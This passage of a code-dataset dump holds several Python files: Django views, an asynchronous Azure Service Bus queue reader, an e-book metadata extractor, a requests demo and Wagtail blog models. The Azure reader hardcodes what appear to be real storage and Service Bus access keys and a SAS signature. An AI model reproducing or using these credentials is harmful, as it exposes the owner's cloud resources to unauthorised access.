39, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 40, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 41, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 46, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 46, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 50, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 50, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 55, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 55, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 59, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 59, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 63, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 64, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 64, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 77, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 77, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 78, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 78, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 79, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 79, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 81, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 81, "usage_type": "name"}]}
+{"seq_id": "16615576616", "text": "from django.http import HttpResponse\n\"\"\" Utils \"\"\"\nfrom datetime import datetime\nimport json\n\n\ndef hello_world(request):\n now = datetime.now().strftime('%dth, %b %Y - %H:%M hrs')\n return HttpResponse(f'Hola Josselincita son las {now}')\n\n\ndef sorted_func(request):\n numbers = [int(i) for i in request.GET['numbers'].split(',')]\n sorted_int = sorted(numbers)\n res_data = {\n 'status': 'OK',\n 'numbers': sorted_int,\n 'message': 'Integers sorted sussessfully'\n }\n \"\"\" import pdb\n pdb.set_trace() \"\"\"\n return HttpResponse(json.dumps(res_data), content_type='application/json')\n\n\ndef say_hi(request, name, age):\n print(name, age)\n if age < 12:\n message = f'{name} eres menor de {age} años'\n else:\n message = f'{name} eres mayor de {age} años'\n return HttpResponse(message)\n", "repo_name": "josseline534/project-django", "sub_path": "platziGram/platziGram/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 842, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "datetime.datetime.now", "line_number": 8, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 8, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 9, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 22, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 22, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 31, "usage_type": "call"}]}
+{"seq_id": "42859792276", "text": "import time\nimport random\nimport json\nimport asyncio\nfrom aiohttp import ClientSession\nfrom sastoken import get_auth_token\nfrom config import queuename, tablename, failqueue\nfrom azure.storage.table import TableService\nfrom azure.servicebus import ServiceBusService\n\n# make Table if it doesn't exist\ntable_service = TableService(account_name='gregseon4e059a98c11c',\\\n account_key='yE7Kuy0xVxUDR+wHGoWPjSpOhFO9WLd9b+t3+RI9C8tuBNbuLwEtWSQGERiO7LJRE1cFTGB0/TT4+CYGhtMfww==')\nif not table_service.exists(tablename):\n table_service.create_table(tablename)\n\n# make queues if they dont exist\nbus_service = ServiceBusService(service_namespace='gregseon4e059a98c11c',\\\n shared_access_key_name='RootManageSharedAccessKey',\\\n shared_access_key_value='d8PrqA7to95t0wUFywAfhNDcbUwvh2sIpiHqvUdbPSQ=')\nbus_service.create_queue(queuename)\nbus_service.create_queue(failqueue)\n\n#generate token for https comms\nsas = get_auth_token(\"gregseon4e059a98c11c\",queuename,\"RootManageSharedAccessKey\",\"d8PrqA7to95t0wUFywAfhNDcbUwvh2sIpiHqvUdbPSQ=\")\nsas2 = get_auth_token(\"gregseon4e059a98c11c\",failqueue,\"RootManageSharedAccessKey\",\"d8PrqA7to95t0wUFywAfhNDcbUwvh2sIpiHqvUdbPSQ=\")\n\nasync def tblwrite(msg,session):\n ''' Write message to table '''\n uri = \"https://gregseon4e059a98c11c.table.core.windows.net/\" + tablename + \"?sv=2017-04-17&ss=bfqt&srt=sco&sp=rwdlacup&se=2017-11-30T08:49:46Z&st=2017-11-18T00:49:46Z&spr=https&sig=XL0n1GIAFRslWdTOZY8ivSqK7hQqW7SZXpLHCWrUSmw%3D\"\n tid = str(msg[\"TransactionID\"])\n suid = str(msg[\"UserId\"]) + str(msg[\"SellerID\"]) \n data = json.dumps({\"PartitionKey\":tid,\"RowKey\": suid, \"message\":str(msg)})\n headers = {'Content-Type':'application/json;odata=nometadata','Content-Length':str(len(data)),'Prefer':'return-no-content'}\n async with session.post(uri,headers=headers,data=data) as response:\n if response.status == 409 or response.status == 204:\n pass # this means it was either duplicate key pairs or inserted fine\n else:\n asyncio.sleep(5) # circuit breaker like approach that accepts that the message failed to be sent immediately and waits before resending same message.\n await tblwrite(msg,session)\n return response.status\n\nasync def sendfailure(data,session):\n ''' Write failure to second queue '''\n try:\n global sas2\n headers = {'Authorization':sas2[\"token\"],'Content-Type':'Content-Type: application/vnd.microsoft.servicebus.json'}\n URL = \"https://gregseon4e059a98c11c.servicebus.windows.net/\"+failqueue+\"/messages\"\n async with session.post(URL, data=data, headers=headers) as response:\n if response.status != 201:\n asyncio.sleep(5) # sort of like a circuit breaker pattern. Wait 5 seconds and retry\n await sendfailure(data, session)\n return await response.read()\n except asyncio.TimeoutError:\n pass \n\nasync def getmsg(session):\n ''' send message async '''\n global sas\n headers = {'Authorization':sas[\"token\"], 'Content-Type': \\\n 'application/atom+xml;type=entry;charset=utf-8'}\n URL = \"https://gregseon4e059a98c11c.servicebus.windows.net/\"+queuename+\"/messages/head\"\n async with session.delete(URL, headers=headers) as response:\n if response.status not in (200,204):\n # add another read if https breaks downs for this read.\n # Message should still be in queue and unlocked for another competing consumer.\n await getmsg(session)\n elif response.status == 204: # means queue empty and nothing to write to table. return now\n return None\n else: # means message recieved\n msg = json.loads([x async for x in response.content][0].decode())\n if msg['failure'] == \"yes\":\n await sendfailure(msg,session) #write to failure queue is yes\n else:\n await tblwrite(msg, session)\n return await response.read()\n\nasync def boundgetmsg(sem, session):\n ''' async semaphore '''\n async with sem:\n await getmsg(session)\n\nasync def run(r):\n ''' kicks off the asynchronous generation of the post requests '''\n sem = asyncio.Semaphore(1000)\n tasks = []\n async with ClientSession() as session:\n for _ in range(r):\n task = asyncio.ensure_future(boundgetmsg(sem, session))\n tasks.append(task)\n responses = asyncio.gather(*tasks)\n await responses \n\ndef readqueue(num_messages):\n N = num_messages\n LOOP = asyncio.get_event_loop()\n FUTURE = asyncio.ensure_future(run(N))\n LOOP.run_until_complete(FUTURE)\n return\n\n\n", "repo_name": "gregory1506/Assignment3", "sub_path": "read.py", "file_name": "read.py", "file_ext": "py", "file_size_in_byte": 4634, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "azure.storage.table.TableService", "line_number": 12, "usage_type": "call"}, {"api_name": "config.tablename", "line_number": 14, "usage_type": "argument"}, {"api_name": "config.tablename", "line_number": 15, "usage_type": "argument"}, {"api_name": "azure.servicebus.ServiceBusService", "line_number": 18, "usage_type": "call"}, {"api_name": "config.queuename", "line_number": 21, "usage_type": "argument"}, {"api_name": "config.failqueue", "line_number": 22, "usage_type": "argument"}, {"api_name": "sastoken.get_auth_token", "line_number": 25, "usage_type": "call"}, {"api_name": "config.queuename", "line_number": 25, "usage_type": "argument"}, {"api_name": "sastoken.get_auth_token", "line_number": 26, "usage_type": "call"}, {"api_name": "config.failqueue", "line_number": 26, "usage_type": "argument"}, {"api_name": "config.tablename", "line_number": 30, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 33, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 39, "usage_type": "call"}, {"api_name": "config.failqueue", "line_number": 48, "usage_type": "name"}, {"api_name": "asyncio.sleep", "line_number": 51, "usage_type": "call"}, {"api_name": "asyncio.TimeoutError", "line_number": 54, "usage_type": "attribute"}, {"api_name": "config.queuename", "line_number": 62, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 71, "usage_type": "call"}, {"api_name": "asyncio.Semaphore", "line_number": 85, "usage_type": "call"}, {"api_name": "aiohttp.ClientSession", "line_number": 87, "usage_type": "call"}, {"api_name": "asyncio.ensure_future", "line_number": 89, "usage_type": "call"}, {"api_name": "asyncio.gather", "line_number": 91, "usage_type": "call"}, {"api_name": "asyncio.get_event_loop", "line_number": 96, "usage_type": "call"}, {"api_name": "asyncio.ensure_future", "line_number": 97, "usage_type": "call"}]}
+{"seq_id": "31113909967", "text": "# -*- coding: utf-8 -*-\n# vi:si:et:sw=4:sts=4:ts=4\n\n\nimport base64\nimport hashlib\nimport os\nimport codecs\n\nimport ox\n\nfrom . import pdf\nfrom . import cbr\nfrom . import epub\nfrom . import txt\nfrom . import opf\n\ndef get_id(f=None, data=None):\n if data:\n return base64.b32encode(hashlib.sha1(data).digest()).decode()\n else:\n return base64.b32encode(codecs.decode(ox.sha1sum(f, cached=True), 'hex')).decode()\n\n\ndef metadata(f, from_=None):\n ext = f.split('.')[-1]\n data = {}\n data['extension'] = ext\n data['size'] = os.stat(f).st_size\n\n if ext == 'cbr':\n info = cbr.info(f)\n elif ext == 'epub':\n info = epub.info(f)\n elif ext == 'pdf':\n info = pdf.info(f)\n elif ext == 'txt':\n info = txt.info(f)\n\n opf_info = {}\n metadata_opf = os.path.join(os.path.dirname(from_ or f), 'metadata.opf')\n if os.path.exists(metadata_opf):\n opf_info = opf.info(metadata_opf)\n for key in (\n 'title', 'author', 'date', 'publisher', 'description',\n 'language', 'textsize', 'pages',\n 'isbn', 'asin'\n ):\n if key in info:\n value = info[key]\n if isinstance(value, bytes):\n try:\n value = value.decode('utf-8')\n except:\n value = None\n if value:\n data[key] = info[key]\n if key in opf_info:\n data[key] = opf_info[key]\n if key in data:\n if isinstance(data[key], str):\n data[key] = data[key].replace('\\x00', '')\n elif isinstance(data[key], list):\n data[key] = [e.replace('\\x00', '') if isinstance(e, str) else e for e in data[key]]\n if 'isbn' in data:\n data['primaryid'] = ['isbn', data['isbn'][0]]\n elif 'asin' in data:\n data['primaryid'] = ['asin', data['asin'][0]]\n if 'author' in data:\n if isinstance(data['author'], str):\n if data['author'].strip():\n data['author'] = data['author'].strip().split('; ')\n else:\n del data['author']\n if 'author' in data and data['author'] in (['Administrator'], ['Default'], ['user']):\n del data['author']\n if not 'title' in data:\n data['title'] = os.path.splitext(os.path.basename(f))[0]\n if data['title'].startswith('Microsoft Word - '):\n data['title'] = data['title'][len('Microsoft Word - '):]\n for postfix in ('.doc', 'docx', '.qxd', '.indd', '.tex'):\n if data['title'].endswith(postfix):\n data['title'] = data['title'][:-len(postfix)]\n if not data['title'].strip():\n del data['title']\n return data\n\n", "repo_name": "h4ck3rm1k3/openmedialibrary", "sub_path": "oml/media/__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 2693, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "base64.b32encode", "line_number": 20, "usage_type": "call"}, {"api_name": "hashlib.sha1", "line_number": 20, "usage_type": "call"}, {"api_name": "base64.b32encode", "line_number": 22, "usage_type": "call"}, {"api_name": "codecs.decode", "line_number": 22, "usage_type": "call"}, {"api_name": "ox.sha1sum", "line_number": 22, "usage_type": "call"}, {"api_name": "os.stat", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path", "line_number": 41, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 42, "usage_type": "call"}, {"api_name": "os.path", "line_number": 42, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 78, "usage_type": "call"}, {"api_name": "os.path", "line_number": 78, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 78, "usage_type": "call"}]}
+{"seq_id": "31004733457", "text": "import requests\n\n\nif __name__ == '__main__':\n url = \"http://www.httpbin.org/post\"\n params_dict = {\n \"name\":\"alice\",\n \"age\":25\n }\n headers_dict = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36\"\n }\n response = requests.post(url,data=params_dict,headers=headers_dict)\n print(\"响应状态码:\",response.status_code)\n print(\"最终URL是:\",response.url)\n print(\"响应内容\",response.text)", "repo_name": "SpCrazy/crazy", "sub_path": "code/SpiderDay03/requests_demo/requests_post.py", "file_name": "requests_post.py", "file_ext": "py", "file_size_in_byte": 525, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "requests.post", "line_number": 13, "usage_type": "call"}]}
+{"seq_id": "11131115676", "text": "from django.db import models\n\n# Create your models here.\n\nfrom django import forms\nfrom django.db import models\n\n# Create your models here.\n\nfrom modelcluster.fields import ParentalKey, ParentalManyToManyField\nfrom modelcluster.contrib.taggit import ClusterTaggableManager\nfrom taggit.models import TaggedItemBase\n\nfrom wagtail.core.models import Page, Orderable\nfrom wagtail.core.fields import RichTextField\nfrom wagtail.admin.edit_handlers import FieldPanel, InlinePanel, MultiFieldPanel\nfrom wagtail.images.edit_handlers import ImageChooserPanel\nfrom wagtail.search import index\nfrom wagtail.search.backends import get_search_backend\n\nfrom wagtail.snippets.models import register_snippet\n\nfrom wagtail.core.fields import StreamField\nfrom wagtail.core import blocks\nfrom wagtail.admin.edit_handlers import StreamFieldPanel\nfrom wagtail.images.blocks import ImageChooserBlock\nfrom wagtail.embeds.blocks import EmbedBlock\nfrom wagtail.core import blocks\n\nfrom src.tools import PageTree, readFile\nfrom src.blocks import TwoColumnBlock, ThreeColumnBlock, VideoBlock, DjangoBlock\n\nimport os\nfrom django.shortcuts import render\n\n\n#setting side content\ndef side(context):\n Posts = Site1Index.objects.all()[0]\n blogpages = Posts.get_children().live().order_by('-first_published_at')\n context['last_posts'] = blogpages[:4]\n\n\nclass Site1Home(Page):\n body = RichTextField(blank=True)\n\n content = StreamField([\n ('paragraph', blocks.RichTextBlock()),\n ('exe_htmljs', blocks.TextBlock()),\n ],null=True,blank=True)\n\n content_panels = Page.content_panels + [\n FieldPanel('body'),\n StreamFieldPanel('content'),\n ]\n\n\n\n def get_context(self, request):\n # Update context to include only published posts, ordered by reverse-chron\n context = super().get_context(request)\n side(context)\n return context\n\nclass Site1Index(Page):\n intro = RichTextField(blank=True)\n\n content_panels = Page.content_panels + [\n FieldPanel('intro', classname=\"full\")\n ]\n\n def get_context(self, request):\n # Update context to include only published posts, ordered by reverse-chron\n context = super().get_context(request)\n blogpages = self.get_children().live().order_by('-first_published_at')\n context['blogpages'] = blogpages\n side(context)\n return context\n\n\nclass Site1Tag(TaggedItemBase):\n content_object = ParentalKey(\n 'Site1Post',\n related_name='tagged_items',\n on_delete=models.CASCADE\n )\n\n\n@register_snippet\nclass Site1Category(models.Model):\n name = models.CharField(max_length=255)\n icon = models.ForeignKey(\n 'wagtailimages.Image', null=True, blank=True,\n on_delete=models.SET_NULL, related_name='+'\n )\n\n panels = [\n FieldPanel('name'),\n ImageChooserPanel('icon'),\n ]\n\n def __str__(self):\n return self.name\n\n class Meta:\n verbose_name_plural = 'site1(tech) categories'\n\nclass Site1Post(Page):\n date = models.DateField(\"Post date\")\n intro = models.CharField(max_length=250, blank=True)\n# body = RichTextField(blank=True)\n tags = ClusterTaggableManager(through=Site1Tag, blank=True)\n categories = ParentalManyToManyField('site1.Site1Category', blank=True)\n\n body = StreamField([\n ('heading', blocks.CharBlock(classname=\"full title\")),\n ('paragraph', blocks.RichTextBlock()),\n ('two_columns', TwoColumnBlock()),\n ('three_columns', ThreeColumnBlock()),\n ('image', ImageChooserBlock()),\n ('exe_htmljs', blocks.TextBlock()),\n ('code_bash', blocks.TextBlock()),\n ('code_py', blocks.TextBlock()),\n ('code_htmljs', blocks.TextBlock()),\n ('code_django', DjangoBlock()),\n #('video', VideoBlock()),\n ],null=True,blank=True)\n\n\n search_fields = Page.search_fields + [\n index.SearchField('intro'),\n index.SearchField('body'),\n ]\n\n# content_panels = Page.content_panels + [\n# FieldPanel('date'),\n# FieldPanel('intro'),\n# FieldPanel('body', classname=\"full\"),\n# InlinePanel('gallery_images', label=\"Gallery images\"),\n# ]\n\n content_panels = Page.content_panels + [\n MultiFieldPanel([\n FieldPanel('date'),\n FieldPanel('tags'),\n FieldPanel('categories', widget=forms.CheckboxSelectMultiple),\n ], heading=\"Blog information\"),\n FieldPanel('intro'),\n #FieldPanel('body'),\n StreamFieldPanel('body'),\n InlinePanel('gallery_images', label=\"Gallery images\"),\n ]\n\n def get_context(self, request):\n # Update context to include only published posts, ordered by reverse-chron\n context = super().get_context(request)\n side(context)\n return context\n \n\nclass Site1PageGalleryImage(Orderable):\n page = ParentalKey(Site1Post, on_delete=models.CASCADE, related_name='gallery_images')\n image = models.ForeignKey(\n 'wagtailimages.Image', on_delete=models.CASCADE, related_name='+'\n )\n caption = models.CharField(blank=True, max_length=250)\n\n panels = [\n ImageChooserPanel('image'),\n FieldPanel('caption'),\n ]\n\n\nclass Site1Tree(Page):\n def get_context(self, request):\n context = super().get_context(request)\n\n index = Site1Index.objects.filter(title='Posts')[0]\n #posts = index.get_children().live()\n #print(posts)\n #context['posts'] = posts\n\n html_menu = PageTree(index).html_menu\n context['menu'] = html_menu\n side(context)\n return context\n\nclass Site1Search(Page):\n def get_context(self, request):\n word = request.GET.get('key')\n context = super().get_context(request)\n s = get_search_backend()\n posts = s.search(word, Site1Post)\n context['posts'] = posts\n side(context)\n return context\n\nclass Site1QueryCategory(Page):\n def get_context(self, request):\n categoryName = request.GET.get('name')\n \n # Filter posts by category name\n rez = Site1Category.objects.filter(name=categoryName)\n \n if (len(rez) == 0):\n return\n else:\n # Update template context\n context = super().get_context(request)\n\n blogpages = Site1Post.objects.filter(categories=rez[0])\n context['blogpages'] = blogpages\n side(context)\n return context\n\n template = 'site1_index.html'\n\nclass Site1CategoryIndex(Page):\n def get_context(self, request):\n categories = Site1Category.objects.all()\n context = super().get_context(request)\n context['categories'] = categories \n side(context)\n return context\n\nclass Site1TagIndex(Page):\n def get_context(self, request):\n context = super().get_context(request)\n tagList = []\n tags = Site1Tag.objects.all()\n #tags = Site1Tag.objects.order_by(\"tag\")\n for tag in tags:\n if tag.tag.name not in tagList:\n tagList.append(tag.tag.name)\n tagList.sort()\n context['tags'] = tagList\n side(context)\n return context\n\nclass Site1QueryTag(Page):\n\n def get_context(self, request):\n # Filter by tag\n tag = request.GET.get('name')\n blogpages = Site1Post.objects.filter(tags__name=tag)\n\n # Update template context\n context = super().get_context(request)\n context['blogpages'] = blogpages\n side(context)\n return context\n\n#this page will display raw html files as body\nclass Site1RawHtml(Page):\n file_name = models.CharField(max_length=255)\n\n content_panels = Page.content_panels + [\n FieldPanel('file_name', classname=\"full\")\n ]\n\n# search_fields = Page.search_fields + [\n# index.SearchField(''),\n# ]\n\n def serve(self, request):\n context = super().get_context(request)\n\n #name = \"codeberry.html\"\n name = self.file_name\n\n base = os.getcwd()\n path = \"site1/\" + \"static/site1/pages/\" + name\n\n f = open(path, \"r\")\n body = f.read();\n f.close()\n\n side(context)\n\n return render(request, 'site1/site1_page.html', {'body':body})\n", "repo_name": "mihai2014/wagtail-multi-blog-sites-with-bootstrap-4", "sub_path": "site1/models.py", "file_name": "models.py", "file_ext": "py", "file_size_in_byte": 8221, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "wagtail.core.models.Page", "line_number": 44, "usage_type": "name"}, {"api_name": "wagtail.core.fields.RichTextField", "line_number": 45, "usage_type": "call"}, {"api_name": "wagtail.core.fields.StreamField", "line_number": 47, "usage_type": "call"}, {"api_name": "wagtail.core.blocks.RichTextBlock", "line_number": 48, "usage_type": "call"}, {"api_name": "wagtail.core.blocks", "line_number": 48, "usage_type": "name"}, {"api_name": "wagtail.core.blocks.TextBlock", "line_number": 49, "usage_type": "call"}, {"api_name": "wagtail.core.blocks", "line_number": 49, "usage_type": "name"}, {"api_name": "wagtail.core.models.Page.content_panels", "line_number": 52, "usage_type": "attribute"}, {"api_name": "wagtail.core.models.Page", "line_number": 52, "usage_type": "name"}, {"api_name": "wagtail.admin.edit_handlers.FieldPanel", "line_number": 53, "usage_type": "call"}, {"api_name": "wagtail.admin.edit_handlers.StreamFieldPanel", "line_number": 54, "usage_type": "call"}, {"api_name": "wagtail.core.models.Page", "line_number": 65, "usage_type": "name"}, {"api_name": "wagtail.core.fields.RichTextField", "line_number": 66, "usage_type": "call"}, {"api_name": "wagtail.core.models.Page.content_panels", "line_number": 68, "usage_type": "attribute"}, {"api_name": "wagtail.core.models.Page", "line_number": 68, "usage_type": "name"}, {"api_name": "wagtail.admin.edit_handlers.FieldPanel", "line_number": 69, "usage_type": "call"}, {"api_name": "taggit.models.TaggedItemBase", "line_number": 81, "usage_type": "name"}, {"api_name": "modelcluster.fields.ParentalKey", "line_number": 82, "usage_type": "call"}, {"api_name": "django.db.models.CASCADE", "line_number": 85, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 85, "usage_type": "name"}, {"api_name": "django.db.models.Model", "line_number": 90, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 90, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 91, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 91, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 92, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 92, "usage_type": "name"}, {"api_name": "django.db.models.SET_NULL", "line_number": 94, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 94, "usage_type": "name"}, {"api_name": "wagtail.admin.edit_handlers.FieldPanel", "line_number": 98, "usage_type": "call"}, {"api_name": "wagtail.images.edit_handlers.ImageChooserPanel", "line_number": 99, "usage_type": "call"}, {"api_name": "wagtail.snippets.models.register_snippet", "line_number": 89, "usage_type": "name"}, {"api_name": "wagtail.core.models.Page", "line_number": 108, "usage_type": "name"}, {"api_name": "django.db.models.DateField", "line_number": 109, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 109, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 110, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 110, "usage_type": "name"}, {"api_name": "modelcluster.contrib.taggit.ClusterTaggableManager", "line_number": 112, "usage_type": "call"}, {"api_name": "modelcluster.fields.ParentalManyToManyField", "line_number": 113, "usage_type": "call"}, {"api_name": "wagtail.core.fields.StreamField", "line_number": 115, "usage_type": "call"}, {"api_name": "wagtail.core.blocks.CharBlock", "line_number": 116, "usage_type": "call"}, {"api_name": "wagtail.core.blocks", "line_number": 116, "usage_type": "name"}, {"api_name": "wagtail.core.blocks.RichTextBlock", "line_number": 117, "usage_type": "call"}, {"api_name": "wagtail.core.blocks", "line_number": 117, "usage_type": "name"}, {"api_name": "src.blocks.TwoColumnBlock", "line_number": 118, "usage_type": "call"}, {"api_name": "src.blocks.ThreeColumnBlock", "line_number": 119, "usage_type": "call"}, {"api_name": "wagtail.images.blocks.ImageChooserBlock", "line_number": 120, "usage_type": "call"}, {"api_name": "wagtail.core.blocks.TextBlock", "line_number": 121, "usage_type": "call"}, {"api_name": "wagtail.core.blocks", "line_number": 121, "usage_type": "name"}, {"api_name": "wagtail.core.blocks.TextBlock", "line_number": 122, "usage_type": "call"}, {"api_name": "wagtail.core.blocks", "line_number": 122, "usage_type": "name"}, {"api_name": "wagtail.core.blocks.TextBlock", "line_number": 123, "usage_type": "call"}, {"api_name": "wagtail.core.blocks", "line_number": 123, "usage_type": "name"}, {"api_name": "wagtail.core.blocks.TextBlock", "line_number": 124, "usage_type": "call"}, {"api_name": "wagtail.core.blocks", "line_number": 124, "usage_type": "name"}, {"api_name": "src.blocks.DjangoBlock", "line_number": 125, "usage_type": "call"}, {"api_name": "wagtail.core.models.Page.search_fields", "line_number": 130, "usage_type": "attribute"}, {"api_name": "wagtail.core.models.Page", "line_number": 130, "usage_type": "name"}, {"api_name": "wagtail.search.index.SearchField", "line_number": 131, "usage_type": "call"}, {"api_name": "wagtail.search.index", "line_number": 131, "usage_type": "name"}, {"api_name": "wagtail.search.index.SearchField", "line_number": 132, "usage_type": "call"}, {"api_name": "wagtail.search.index", "line_number": 132, "usage_type": "name"}, {"api_name": "wagtail.core.models.Page.content_panels", "line_number": 142, "usage_type": "attribute"}, {"api_name": "wagtail.core.models.Page", "line_number": 142, "usage_type": "name"}, {"api_name": "wagtail.admin.edit_handlers.MultiFieldPanel", "line_number": 143, "usage_type": "call"}, {"api_name": "wagtail.admin.edit_handlers.FieldPanel", "line_number": 144, "usage_type": "call"}, {"api_name": "wagtail.admin.edit_handlers.FieldPanel", "line_number": 145, "usage_type": "call"}, {"api_name": "wagtail.admin.edit_handlers.FieldPanel", "line_number": 146, "usage_type": "call"}, {"api_name": "django.forms.CheckboxSelectMultiple", "line_number": 146, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 146, "usage_type": "name"}, {"api_name": "wagtail.admin.edit_handlers.FieldPanel", "line_number": 148, "usage_type": "call"}, {"api_name": "wagtail.admin.edit_handlers.StreamFieldPanel", "line_number": 150, "usage_type": "call"}, {"api_name": "wagtail.admin.edit_handlers.InlinePanel", "line_number": 151, "usage_type": "call"}, {"api_name": "wagtail.core.models.Orderable", "line_number": 161, "usage_type": "name"}, {"api_name": "modelcluster.fields.ParentalKey", "line_number": 162, "usage_type": "call"}, {"api_name": "django.db.models.CASCADE", "line_number": 162, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 162, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 163, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 163, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 164, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 164, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 166, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 166, "usage_type": "name"}, {"api_name": "wagtail.images.edit_handlers.ImageChooserPanel", "line_number": 169, "usage_type": "call"}, {"api_name": "wagtail.admin.edit_handlers.FieldPanel", "line_number": 170, "usage_type": "call"}, {"api_name": "wagtail.core.models.Page", "line_number": 174, "usage_type": "name"}, {"api_name": "wagtail.search.index", "line_number": 178, "usage_type": "name"}, {"api_name": "src.tools.PageTree", "line_number": 183, "usage_type": "call"}, {"api_name": "wagtail.search.index", "line_number": 183, "usage_type": "argument"}, {"api_name": "wagtail.core.models.Page", "line_number": 188, "usage_type": "name"}, {"api_name": "wagtail.search.backends.get_search_backend", "line_number": 192, "usage_type": "call"}, {"api_name": "wagtail.core.models.Page", "line_number": 198, "usage_type": "name"}, {"api_name": "wagtail.core.models.Page", "line_number": 218, "usage_type": "name"}, {"api_name": "wagtail.core.models.Page", "line_number": 226, "usage_type": "name"}, {"api_name": "wagtail.core.models.Page", "line_number": 240, "usage_type": "name"}, {"api_name": "wagtail.core.models.Page", "line_number": 254, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 255, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 255, "usage_type": "name"}, {"api_name": "wagtail.core.models.Page.content_panels", "line_number": 257, "usage_type": "attribute"}, {"api_name": "wagtail.core.models.Page", "line_number": 257, "usage_type": "name"}, {"api_name": "wagtail.admin.edit_handlers.FieldPanel", "line_number": 258, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 271, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 280, "usage_type": "call"}]}
